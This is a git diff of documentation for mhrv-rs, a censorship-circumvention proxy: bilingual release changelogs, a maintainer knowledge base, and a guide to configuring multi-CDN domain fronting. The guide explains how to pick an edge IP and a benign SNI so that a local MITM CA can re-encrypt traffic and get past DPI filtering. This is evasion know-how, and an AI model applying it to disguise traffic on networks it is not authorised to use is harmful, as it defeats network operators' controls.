+• Fix tunnel-node: cap each TCP drain at 16 MiB so batch responses stay under Apps Script's ~50 MiB body ceiling ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) by @bankbunk): on high-bandwidth VPS (1 Gbps+), the reader task can stuff the per-session read buffer with tens of MiB between client polls. The old `drain_now` took the entire buffer in one shot, base64-encoded it (1.33× overhead), wrapped it in JSON, and the resulting body exceeded Apps Script's hard ~50 MiB Web App response limit.
Apps Script truncated the body mid-base64; the client failed `serde_json` parse with `EOF while parsing a string at line 1 column 52428685` (= 50 MiB) and the stream tore. Most visibly, raw MP4 streams crashed minutes into playback. The fix splits oversized buffers: at most `TCP_DRAIN_MAX_BYTES` (16 MiB) is returned per drain, and the remainder stays in the buffer for the next poll. EOF is held back until the buffer is fully drained so partial drains don't prematurely close the session. Three regression tests cover the cap, the under-cap pass-through, and the EOF-holdback case (33 tunnel-node tests passing). @bankbunk's `wondershaper` workaround (rate-limiting the VPS interface to 40 Mbps) is no longer necessary — high-bandwidth VPS users can let throughput run at line rate again. diff --git a/docs/changelog/v1.9.0.md b/docs/changelog/v1.9.0.md new file mode 100644 index 00000000..2017b788 --- /dev/null +++ b/docs/changelog/v1.9.0.md @@ -0,0 +1,12 @@ + +• **شکستگی سازگاری minor: نام‌گذاری `mode = "google_only"` به `mode = "direct"` تغییر کرد** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more): نام قدیمی توصیف وضعیت رو بعد از اضافه شدن fronting_groups (که فراتر از Google می‌رسه) درست نمی‌داد. در Rust + Android + UI dropdown همه به `direct` تغییر کرده‌اند، ولی **`google_only` به‌عنوان alias deprecated در parser قابل قبول مونده** — config‌ها و saved settings قدیمی نمی‌شکنن. در Save بعدی، on-disk file خودکار به `direct` migrate می‌شه. در docs (README EN/FA, SF_README EN/FA, tunnel-node FA) note "تا قبل v1.9 نام `google_only` بود — هنوز کار می‌کنه" گذاشته شده برای کاربرانی که از راهنماهای قدیمی یا پست‌های Telegram قدیمی استفاده می‌کنن. 
+• fronting_groups: domain fronting چند-edge برای CDN غیر-Google (Vercel، Fastly، …) (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more، با credit به [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) برای technique اصلی): فیلد جدید config `fronting_groups: [{name, ip, sni, domains}]`. هر group شامل (edge IP، front SNI، domain‌های member). وقتی CONNECT به یکی از domain‌های member می‌رسه، proxy MITM می‌کنه + upstream با `ip` به‌عنوان TCP destination + `sni` به‌عنوان TLS SNI re-encrypt می‌کنه — همان trick که برای `google_ip` + `front_domain` می‌کنیم، حالا قابل تنظیم برای هر CDN multi-tenant. بر روی Google fronting (built-in) برتری داره؛ زیر `passthrough_hosts` و DoH bypass قرار داره. در `mode = full` غیر فعال (که end-to-end TLS رو حفظ می‌کنه + MITM نمی‌کنه). config مثال: `config.fronting-groups.example.json`. doc کامل: `docs/fronting-groups.md` شامل recipe انتخاب `(ip, sni)`، routing precedence، و warning صریح ⚠️ درباره cross-tenant Host-header leak failure mode (هرگز domain‌هایی که واقعاً روی edge نیستند رو list نکنید). reviews folded: SNI با rustls در config-load gate validate می‌شه، `Vec<Arc<…>>` به‌جای clone-on-match، byte-level dot-anchored matcher، startup warnings برای inert combos.
+• edge-cache DNS در CodeFull.gs برای skip کردن round-trip tunnel-node (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) از @dazzling-no-more): `udp_open` ops با port=53 در `_doTunnelBatch` intercept می‌شن + از `CacheService` (cache hit) یا DoH (cache miss) سرو می‌شن. cache hit‌ها latency typical first-hop DNS رو از ~۶۰۰-۱۲۰۰ms به ~۲۰۰-۴۰۰ms پایین می‌آرن. تغییر pure server-side در CodeFull.gs (فقط Full mode — apps_script mode UDP path نداره). بدون تغییر Rust/client. DoH fallback chain: Cloudflare → Google → Quad9 روی RFC 8484 GET. cache key per-qtype برای جلوگیری از A/AAAA collision. TTL clamping در `[30s, 6h]`. NXDOMAIN/SERVFAIL با ۴۵s negative cache.
NODATA-with-SOA بر اساس RFC 2308 §5 SOA TTL رو honor می‌کنه. default-on، opt-out با `ENABLE_EDGE_DNS_CACHE`. هر failure mode به path forward موجود tunnel-node fallback می‌کنه (zero regression). انتخاب CacheService بر روی Sheets به دلیل سرعت (~۱۰ms) + privacy (volatile، روی Drive log persist نمی‌کنه — برای کاربران در صحنه‌های censorship مهمه). ۱۱ تست pure-JS pass. +• default `tunnel_doh: true` (flipped از `false` در v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): default قبلی (DoH bypass فعال) برای کاربران ایرانی بدون نشان دادن چیزی شکست می‌خورد چون Iran ISP direct connection به `dns.google`، `chrome.cloudflare-dns.com` و سایر pinned DoH hosts رو filter می‌کنن — همان hosts که bypass در حال route مستقیم می‌فرستاد. در نتیجه، DNS lookup‌ها fail می‌گرفتن + browsing شکست می‌خورد. حالا default safe است (DoH داخل tunnel نگه داشته می‌شه، در یک شبکه فیلتر شده کار می‌کنه). کاربری روی شبکه‌هایی که direct DoH کار می‌کنه (non-Iran)، می‌تونه `tunnel_doh: false` در config بگذاره برای latency win. تغییر backwards-compatible برای configs موجود — همه‌ی configs دارای فیلد explicit `tunnel_doh` رفتار حفظ می‌شن. +• اشتراک‌گذاری Hotspot iOS/laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) از @yyoyoian-pixel): default `listen_host` از `127.0.0.1` به `0.0.0.0` تغییر کرده. این workflow معمول رو enable می‌کنه — یک phone Android که tunnel run می‌کنه، iPhone یا laptop روی همان hotspot WiFi می‌تونه از proxy استفاده کنه. configs قدیمی با explicit `listen_host: "127.0.0.1"` honor می‌شن (بازنویسی نمی‌شن). +--- +• **Minor breaking: `mode = "google_only"` renamed to `mode = "direct"`** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more): the old name no longer described the mode now that `fronting_groups` reaches more than Google. 
Rust + Android + UI dropdown all updated, but **`google_only` is preserved as a deprecated alias on parse** — existing configs and saved settings don't break. On the next Save, the on-disk file migrates automatically to `direct`. Docs (README EN+FA, SF_README EN+FA, tunnel-node FA) carry a "was named `google_only` before v1.9 — old name still works" note so users following older guides / Telegram posts find their way. +• `fronting_groups`: multi-edge domain fronting for non-Google CDNs (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more, credit to [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) for the original technique): new config field `fronting_groups: [{name, ip, sni, domains}]`. Each group is `(edge IP, front SNI, member domains)`: when a CONNECT to one of the member domains arrives, the proxy MITMs at the local CA, then re-encrypts upstream against `ip` with `sni` as the TLS SNI — same trick we already do for `google_ip` + `front_domain`, now configurable for any multi-tenant CDN edge (Vercel, Fastly, etc.). Wins over the built-in Google SNI-rewrite suffix list; loses to `passthrough_hosts` and DoH bypass. Skipped in `mode = full` (which preserves end-to-end TLS and can't MITM). Working example at `config.fronting-groups.example.json`. Full doc at `docs/fronting-groups.md` including the recipe for picking `(ip, sni)`, routing precedence, and an explicit ⚠️ warning about the cross-tenant Host-header leak failure mode (don't list domains that aren't actually on the edge). Review fixes folded: SNI validated via rustls at config-load gate; `Vec>` refcount on per-CONNECT match; byte-level dot-anchored matcher (no per-match `format!()`); startup warnings for inert combos. 
+• Edge-cache DNS in `CodeFull.gs` to skip the tunnel-node round-trip (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) by @dazzling-no-more): intercepts `udp_open` / port=53 ops in `_doTunnelBatch` and serves them from `CacheService` (cache hit) or DoH (cache miss). Cache hits drop typical first-hop DNS latency from ~600-1200ms to ~200-400ms. Pure server-side change in `CodeFull.gs` (Full mode only — apps_script mode has no UDP path); zero Rust/client changes. DoH fallback chain: Cloudflare → Google → Quad9 over RFC 8484 GET. Per-qtype cache key keeps A and AAAA from colliding. Min RR TTL clamped to `[30s, 6h]`; NXDOMAIN/SERVFAIL get a 45s negative cache; NODATA-with-SOA honors the SOA TTL per RFC 2308 §5. Default-on, opt-out via `ENABLE_EDGE_DNS_CACHE`. Every failure mode (parse error, resolver outage, key-too-long, `cache.put` rejection) falls through to the existing tunnel-node forward path — zero regression on any failure. CacheService chosen over Sheets (#443's pattern) because Sheets reads/writes are 100-500ms per op (often slower than the DoH lookup we'd be caching), have a daily-quota hazard, and persist a Drive-listed log of every domain users resolve — a real privacy regression for users in censorship contexts. CacheService is ~10ms, volatile, free, no on-disk artifact. 11 pure-JS tests covering parsers, txid non-mutation, TTL clamp, NXDOMAIN-with-SOA TTL extraction, malformed/truncated input rejection, splice correctness for mixed batches. +• Default `tunnel_doh: true` (flipped from `false` in v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): the previous default (DoH bypass active) silently broke for Iranian users because Iran ISPs filter direct connections to `dns.google`, `chrome.cloudflare-dns.com`, and other pinned DoH hosts — exactly the hosts the bypass was routing direct. DNS resolution failed and browsing broke. 
The safer default keeps DoH inside the tunnel; users on networks where direct DoH works can opt back into the bypass with `tunnel_doh: false`. Backwards-compatible for existing configs — anyone who explicitly set `tunnel_doh` keeps their behavior. Iranian users on pre-v1.8.6 versions hitting this regression should upgrade. +• Hotspot sharing for iOS / laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) by @yyoyoian-pixel): default `listen_host` changed from `127.0.0.1` to `0.0.0.0`. Enables the common workflow where an Android phone runs the tunnel and an iPhone/iPad/laptop on the same hotspot uses it as a proxy (HTTP `192.168.43.1:8080` or SOCKS5 `:1081`). For full device-wide coverage on iOS, Shadowrocket or Potatso create a local VPN that routes all traffic through the SOCKS5 on the Android phone. Old configs with explicit `"listen_host": "127.0.0.1"` are honored (not overwritten). diff --git a/docs/changelog/v1.9.1.md b/docs/changelog/v1.9.1.md new file mode 100644 index 00000000..675d549c --- /dev/null +++ b/docs/changelog/v1.9.1.md @@ -0,0 +1,10 @@ + +• tunable کردن آستانه auto-blacklist با ۳ field config جدید: `auto_blacklist_strikes` (default 3)، `auto_blacklist_window_secs` (default 30)، `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): تا قبل، threshold روی ۳ timeout در ۳۰ ثانیه = ۱۲۰ ثانیه cooldown hard-coded بود. کاربران single-deployment گزارش دادن این threshold روی شبکه‌های flaky too aggressive هست — یک cold-start stall + دو network blip → فقط deployment آن‌ها lockout می‌شه. حالا قابل تنظیم: single-deployment users می‌تونن `auto_blacklist_strikes: 5` یا `auto_blacklist_cooldown_secs: 30` بزارن. کاربران multi-deployment با ۱۰+ alternatives می‌تونن `auto_blacklist_strikes: 2` بزارن برای fail-fast. 
defaults رفتار قدیمی رو حفظ می‌کنن — هیچ کاربری چیزی notice نمی‌کنه مگر در config صریح override کنه. کاربر در UI form expose نشده — power-user file edit در config.json. clamp [1, 86400] برای جلوگیری از مقادیر غیرمعقول. +• `request_timeout_secs` config (default 30) برای تنظیم batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430)، masterking32 PR #25): تا قبل `BATCH_TIMEOUT = 30s` hard-coded. شبکه‌های Iran ISP slow ممکنه `45` یا `60` بخوان تا Apps Script پیغام ارسال کنه past throttle window. شبکه‌های با fail-fast preference ممکنه `15` بخوان برای retry سریع‌تر هنگام hang. clamp [5s, 300s]. برای کاربر در UI form expose نشده. +• warning روشن‌تر در tunnel-node startup برای recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): چندین قدیمی copy-paste guide از `MHRV_AUTH_KEY` به‌جای `TUNNEL_AUTH_KEY` در docker run استفاده می‌کرد. tunnel-node اون env var رو هرگز نمی‌خوند + silently default `changeme` رو fallback می‌کرد، که باعث AUTH_KEY-mismatch decoy می‌شد در client. حالا اگر `MHRV_AUTH_KEY` set باشه ولی `TUNNEL_AUTH_KEY` نباشه، tunnel-node پیغام specific می‌ده: "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=...". این به کاربر مستقیم کمک می‌کنه به‌جای ساعت‌ها debug. +• run.bat fallback به CLI بعد از UI failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417)، [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426)، [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): قبلاً وقتی هر دو UI renderer (glow + wgpu) fail می‌گرفتن (روی ماشین‌های قدیمی Windows / RDP / VM بدون GPU)، script پیغام "open issue" می‌داد + exit. 
حالا بعد از پیغام error، CLI `mhrv-rs.exe` رو خود اجرا می‌کنه + کاربر می‌تونه به استفاده از proxy ادامه دهد. CLI همان full functionality رو داره بدون UI shell — proxy روی `127.0.0.1:8085` (HTTP) و `127.0.0.1:8086` (SOCKS5). +--- +• Tunable auto-blacklist threshold via three new config fields: `auto_blacklist_strikes` (default 3), `auto_blacklist_window_secs` (default 30), `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): previously hard-coded at "3 timeouts in 30s = 120s cooldown". Single-deployment users reported this threshold was too aggressive on flaky networks — one cold-start stall plus two transient network blips would lock them out of their only relay path. Now tunable: single-deployment users can set `auto_blacklist_strikes: 5` or `auto_blacklist_cooldown_secs: 30` to be more forgiving. Multi-deployment users with 10+ healthy alternatives can set `auto_blacklist_strikes: 2` to fail-fast. Defaults preserve existing behavior — no user notices a change unless they explicitly tune in `config.json`. Not exposed in the UI form yet — power-user file edit. Clamped to [1, 86400] for the duration fields to prevent absurd values. +• `request_timeout_secs` config field (default 30) to tune the batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430), masterking32 PR #25): previously the hard-coded `BATCH_TIMEOUT = 30s` constant. Slow Iran ISP networks may want `45` or `60` to give Apps Script time to respond past throttle windows. Networks preferring fail-fast may want `15` to retry sooner when a deployment hangs. Clamped to [5s, 300s] (anything beyond exceeds Apps Script's 6-min hard cap with no benefit). Not in the UI form. 
+• Clearer tunnel-node startup warning for the recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): several older copy-paste guides used `MHRV_AUTH_KEY` instead of `TUNNEL_AUTH_KEY` in `docker run`. tunnel-node never read that env var and silently fell back to default `changeme`, producing baffling AUTH_KEY-mismatch decoys on the client. Now if `MHRV_AUTH_KEY` is set but `TUNNEL_AUTH_KEY` is not, tunnel-node emits a specific warning: `"MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=<your-key>"`. Saves users hours of debugging the wrong layer. +• `run.bat` falls back to CLI after UI renderer failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417), [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426), [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): when both UI renderers (glow + wgpu) fail on older Windows machines, RDP sessions, or VMs without GPU acceleration, the script previously printed an "open an issue on GitHub" message and exited. Now it prints the diagnostic info AND launches `mhrv-rs.exe` (CLI) so the user can keep using the proxy without the UI shell. CLI has the same proxy functionality on `127.0.0.1:8085` (HTTP) and `127.0.0.1:8086` (SOCKS5); only the visual UI is missing. 
diff --git a/docs/changelog/v1.9.2.md b/docs/changelog/v1.9.2.md new file mode 100644 index 00000000..7fe74aba --- /dev/null +++ b/docs/changelog/v1.9.2.md @@ -0,0 +1,4 @@ + +• backend جایگزین Apps Script + Cloudflare Worker (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) از @dazzling-no-more): deploy `Code.cfw.gs` (variant جدید GAS در `assets/apps_script/`) + `worker.js` (Cloudflare Worker در `assets/cloudflare/`)، Apps Script یک layer thin auth+forward می‌شه که outbound fetch رو به CF edge می‌ده. mhrv-rs خود **بدون تغییر** — همان envelope JSON روی wire، همان `mode: "apps_script"`، `script_id`، `auth_key`. تنها تفاوت چیزی هست که Apps Script deployed بعد از authentication انجام می‌ده. این task audit در roadmap [#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) / [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393) رو close می‌کنه. **چرا** کاربران Persian گزارش دادن GAS+CFW combination از pure GAS برای browsing + chat-style سریع‌تر حس می‌شه. **سختگیر شده over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request AUTH_KEY check (upstream omit می‌کرد → relay open اگر URL leak شد)، fail-closed اگر AUTH_KEY هنوز placeholder باشه، loop guard `x-relay-hop` + self-host fetch block، body drop on GET/HEAD برای match با Code.gs/UrlFetchApp permissiveness، SKIP_HEADERS parity، batch handler با `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **محدودیت‌های صادقانه** (در docs explicit): با `mode: "full"` ناسازگار است (فقط HTTP-relay path port شده، نه raw-TCP/UDP tunnel ops). YouTube long-form بدتر می‌شه (30s CF Worker wall vs Apps Script ~6min — SABR cliff زودتر می‌رسه). Cloudflare anti-bot اثر معکوس داره (Worker IP اغلب stricter از Google IP). Day-one quota relief نیست (path batch ready ولی از client شیپ شده single-shape unreachable). 
**docs کامل** انگلیسی + فارسی در `assets/cloudflare/README.md` + `README.fa.md` شامل setup، model security سه AUTH_KEY match، trade-off table، Full mode incompatibility. +--- +• Apps Script + Cloudflare Worker alternative backend (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) by @dazzling-no-more): deploy `Code.cfw.gs` (new GAS variant in `assets/apps_script/`) plus `worker.js` (Cloudflare Worker in `assets/cloudflare/`), and Apps Script becomes a thin auth+forward layer that pushes the outbound fetch to CF's edge. mhrv-rs itself is **unchanged** — same JSON envelope on the wire, same `mode: "apps_script"`, `script_id`, `auth_key`. The only difference is what the deployed Apps Script does after it authenticates. Closes the audit task on the v1.9.x roadmap ([#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380), [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393)). **Why**: recurring Persian-community feedback reports that GAS+CFW combination feels noticeably faster than plain GAS for browsing and chat-style workloads. **Hardened over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request `AUTH_KEY` check (upstream omitted → open relay if URL leaks), fail-closed if `AUTH_KEY` still equals the placeholder, `x-relay-hop` loop guard + self-host fetch block, drops body on GET/HEAD to match `Code.gs`/UrlFetchApp permissiveness, SKIP_HEADERS parity, batch handler with `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **Honest limitations called out in docs**: not compatible with `mode: "full"` (only HTTP-relay path ported; raw-TCP / UDP tunnel ops needed for messengers under Android full-mode aren't). YouTube long-form gets worse (30 s CF Worker wall vs Apps Script's ~6 min — SABR cliff arrives sooner). Cloudflare anti-bot is unaffected — exit IP becomes a Workers IP, which CF's anti-bot fingerprints as worker-internal (often stricter than a Google IP). 
No day-one `UrlFetchApp` daily-count relief; the batch-aware GAS+Worker path is wired and ready (`ceil(N / 40)` per N-URL batch) but unreachable from any shipping client today (mhrv-rs's HTTP-relay path is single-shape only). **Full docs** in English + Persian at `assets/cloudflare/README.md` + `README.fa.md` covering setup, the three-matching-`AUTH_KEY`s security model, trade-off table, full-mode incompatibility section. README updated with alternative-backend callout in both languages. diff --git a/docs/fronting-groups.md b/docs/fronting-groups.md new file mode 100644 index 00000000..ac57c230 --- /dev/null +++ b/docs/fronting-groups.md @@ -0,0 +1,143 @@ +# Multi-edge fronting groups + +The default mhrv-rs SNI-rewrite path targets Google's edge: TLS goes out +with `SNI=www.google.com` to a Google IP, the inner `Host` header (after +the local MITM CA terminates the browser's TLS) names the real +destination, and Google's frontend routes by `Host`. That's how +`www.youtube.com`, `script.google.com`, and friends reach you despite a +DPI box that drops anything not SNI'd as `www.google.com`. + +The same trick works on any multi-tenant CDN edge that: + +1. serves multiple tenant domains on the same IP pool, and +2. dispatches to the right backend by inner HTTP `Host`, and +3. presents a TLS cert whose name matches the SNI you choose. + +Vercel, Fastly, and AWS CloudFront (which is what Netlify-hosted sites +sit behind) all fit the bill. Pick a benign-looking domain hosted on +the same edge, use it as the SNI, and you can route many other domains +on that edge through the same tunnel without burning Apps Script quota. 
+ +## Config shape + +```jsonc +{ + "mode": "direct", // or apps_script / full + "fronting_groups": [ + { + "name": "vercel", // free-form, used in logs + "ip": "76.76.21.21", // a Vercel edge IP + "sni": "react.dev", // a Vercel-hosted domain + "domains": [ // hosts to route via this group + "vercel.com", "vercel.app", + "nextjs.org", "now.sh" + ] + } + ] +} +``` + +`domains` matches case-insensitively, exact OR dot-anchored suffix — +`vercel.com` covers both `vercel.com` and `*.vercel.com`. First group +in the list whose member matches wins. + +A working example is shipped at `config.fronting-groups.example.json`. + +## Picking the (ip, sni) pair + +The SNI must be a real, currently-live domain on the same edge. rustls +validates the upstream cert against the SNI you send; if the edge +returns a cert that doesn't cover that name, the handshake fails. So +the recipe is: + +1. Pick the target edge (Vercel, Fastly, …). +2. Find a neutral, never-blocked domain hosted there. Vercel: `react.dev`, + `nextjs.org`. Fastly: `www.python.org`, `pypi.org`. AWS CloudFront + (where Netlify lives): `letsencrypt.org`, `aws.amazon.com`. +3. Resolve that domain (`dig +short react.dev A`) — pick one IP, drop + it in `ip`. +4. List the domains you actually want to reach via this edge in + `domains` — **only domains you've verified are hosted on the same + edge as `sni`** (see warning below). + +Edge IPs rotate. If a group's `ip` stops working, re-resolve the SNI +domain and update the config — IP rotation per-group is on the +roadmap but not implemented yet. + +## ⚠️ Cross-tenant leak: don't list domains that aren't on the edge + +If you put a domain in `domains` that is **not** actually hosted on the +edge you've configured, two things happen, both bad: + +1. **Privacy leak.** The proxy completes a TLS handshake with the edge + (validated against `sni`, which IS on the edge), then sends `Host: + ` inside that encrypted stream. 
The edge — which is + not your-domain's host — now sees a request labelled with + your-domain's name. From the edge's perspective, *you* deliberately + sent that request to them. Vercel/Fastly logs will show your-domain + in their access logs, attributable to your IP and timestamps. + +2. **UX failure.** The edge has no backend for your-domain, so it + returns its default 404 / wrong-tenant page. The site appears + "broken via mhrv-rs" but works fine over a normal connection, + which is confusing to debug. + +**Verify before listing.** A simple check: if `dig +short your-domain +A` returns an IP that's *also* one of the edge's IPs, you're fine. If +the IPs differ, your-domain is hosted somewhere else and listing it +will leak. This is also why the upstream MITM-DomainFronting Xray +config uses `verifyPeerCertByName` with an explicit SAN allowlist — +it's a second guard against accidentally fronting unrelated domains +through the same edge. mhrv-rs leaves verification to rustls + the +SNI you send; the leak guard is "you, the operator, listing only +domains you've verified." + +Only listed domains are routed to the group. Anything else falls +through to the next dispatch step (Google SNI-rewrite or Apps Script +relay), so unrelated traffic does NOT accidentally hit a group's edge. + +## Routing precedence + +Within a single CONNECT, the dispatch order is: + +1. `passthrough_hosts` — explicit user opt-out. +2. DoH bypass (port 443, known DoH host). +3. `mode = full` — everything via the batch tunnel mux. +4. **`fronting_groups` match (port 443).** — this feature. +5. Built-in Google SNI-rewrite suffix list (port 443). +6. `mode = direct` fallback → raw TCP. +7. `mode = apps_script` peek + relay. + +So fronting groups beat the Google-edge default for hosts they list, +but lose to user-explicit passthrough/DoH choices. 
Putting `vercel.com` +in a Vercel fronting group will route Vercel traffic through Vercel's +edge directly, not through the Apps Script relay or the Google edge. + +## Limitations / what's not here yet + +- **Single IP per group.** Real edges have many; we'll add a pool with + health-checking when there's a clear need. Workaround: when the + configured IP starts failing, swap it. +- **No bundled domain catalog.** The upstream Xray config uses + `geosite:vercel` / `geosite:fastly` lists from a binary geosite + database — we don't ship that, you list domains explicitly. +- **No UI editor.** Edit `config.json` directly. The UI's Save path + preserves your `fronting_groups` block (round-tripped) — it just + doesn't render an editor for it. +- **Browsers only for Android non-root**, same as the Google path — + third-party apps that don't trust user CAs (Telegram, Instagram, …) + can't be MITM'd, so this trick doesn't help them. +- **Cert verification matches the SNI.** No per-group SAN allowlist + (the upstream config's `verifyPeerCertByName`); the SNI you send IS what rustls + validates against. If you want stricter pinning, setting `verify_ssl: + false` is the wrong answer — instead, pick an SNI whose cert + genuinely covers your targets. + +## Credit + +The technique is the same one [@masterking32](https://github.com/masterking32)'s original +MasterHttpRelayVPN demonstrated for Google's edge. The Vercel + +Fastly extension and the matching Xray config came from +[@patterniha](https://github.com/patterniha)'s [MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) +project — this `fronting_groups` field is a Rust port of that idea +into mhrv-rs's existing dispatcher. diff --git a/docs/maintainer/README.md b/docs/maintainer/README.md new file mode 100644 index 00000000..5639af45 --- /dev/null +++ b/docs/maintainer/README.md @@ -0,0 +1,18 @@ +# Maintainer knowledge base + +Project-internal knowledge base for triaging issues, reviewing PRs, cutting releases, and writing user-facing replies in the project's voice. 
Treat this as canonical context for any maintenance work — local or automated. + +## Read order + +Start with `SKILL.md` for orientation, conventions, and pointers. Then read references lazily as relevant to the current task: + +- `references/architecture.md` — apps_script vs Full mode, MITM CA, tunnel-node, AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE, SNI rewriting, Apps Script's hidden constraints +- `references/issue-patterns.md` — recurring user issue patterns with diagnostic procedures and canonical reply structures +- `references/diagnostic-taxonomy.md` — six candidate causes for the placeholder body, DIAGNOSTIC_MODE disambiguator +- `references/workflow-conventions.md` — reply marker, Persian/English match rule, changelog format, commit messages, close reasons +- `references/release-workflow.md` — Cargo.toml → tag → Telegram pipeline +- `references/contributors.md` — core contributor roles + their substantive PRs +- `references/roadmap.md` — current and upcoming release batches +- `references/persian-templates.md` — adaptable Persian reply templates and standardized phrasings +- `assets/changelog-template.md` — starter template for a new `docs/changelog/vX.Y.Z.md` +- `assets/reply-marker.md` — the standard reply footer diff --git a/docs/maintainer/SKILL.md b/docs/maintainer/SKILL.md new file mode 100644 index 00000000..e24568b6 --- /dev/null +++ b/docs/maintainer/SKILL.md @@ -0,0 +1,114 @@ +# mhrv-rs maintenance + +This document encodes the project context, recurring patterns, and conventions needed to ship code, triage issues, and respond to users effectively. It is the entry point to the broader knowledge base in `references/`. + +## Why this matters + +mhrv-rs is **infrastructure for circumvention**. The bulk of the userbase is in Iran — under one of the world's heaviest internet censorship regimes — using this tool to reach YouTube, Wikipedia, Telegram, GitHub, news sites, banking, and (critically) to communicate with family abroad. 
A non-trivial fraction of users are in Russia, China, Belarus, and other censored networks, but Iran dominates the issue tracker. + +The architecture's importance is the architecture itself: by routing traffic through Google Apps Script, the user's ISP only sees encrypted HTTPS to Google IPs (`216.239.38.120` etc.) — the exact same fingerprint as `www.google.com`. ISPs that block conventional VPNs are forced to either let mhrv-rs through or break Google access for the entire country. This asymmetry is what makes the project work, and it shapes every architectural decision. + +When responding to a Persian-language issue, the responder is often the only English-speaking maintainer the reporter has access to. Be clear, generous, and specific. When shipping a release, you're shipping it to people for whom the alternative is not "use a different tool" but "lose internet access". This drives the project's bias toward shipping over polish, toward backwards-compatible defaults, and toward documenting workarounds even when the proper fix is months away. + +## Working directory and conventions + +This is a standard Rust project. `cd` into your local clone before running git/gh/cargo commands, or use absolute paths. Reply markdown files for `gh issue comment --body-file` are conventionally written to a temporary file (e.g., `/tmp/...`) before posting, to avoid HEREDOC quoting issues with backticks and `$()` substitutions. + +## Reference files (read as needed) + +This knowledge base is structured for progressive disclosure. The body below covers conventions and reflexes; the reference files have the deep context for specific tasks. Read them lazily — only the ones relevant to what you're doing. + +- **`references/architecture.md`** — Read when explaining the system to a user, debugging unfamiliar log patterns, or making an architectural decision. 
Covers domain fronting, apps_script vs Full mode, MITM CA, tunnel-node, the AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE distinction, SNI rewriting, and `google_ip` rotation. +- **`references/issue-patterns.md`** — Read when triaging a new issue. Catalogs the most common user-reported issue patterns with diagnostic procedures and canonical reply structures. +- **`references/diagnostic-taxonomy.md`** — Read when a user shows a failure log with `no json in batch response` or HTML body. The six candidate causes for the placeholder body, what each looks like, and how `DIAGNOSTIC_MODE=true` disambiguates them. +- **`references/workflow-conventions.md`** — Read when writing a reply, changelog, or commit message. Reply marker, Persian-vs-English language convention, changelog format, semver discipline. +- **`references/release-workflow.md`** — Read when cutting a release. Cargo.toml bump → changelog → commit → tag → push, then auto-fired CI handles the rest (release builds + Telegram channel publishing). +- **`references/contributors.md`** — Read when interacting with named contributors. Each top contributor has a domain they specialize in. +- **`references/roadmap.md`** — Read when categorizing a feature request. Current and upcoming release batches. +- **`references/persian-templates.md`** — Read when writing a Persian reply. Common phrases and full-paragraph templates for the most-repeated Persian-language situations. +- **`assets/changelog-template.md`** — Use as the starting template when creating a new `docs/changelog/vX.Y.Z.md` file. +- **`assets/reply-marker.md`** — The exact reply footer to append to every issue/PR comment. + +## Conventions to internalize + +These show up so frequently they should be memorized rather than looked up each time. 
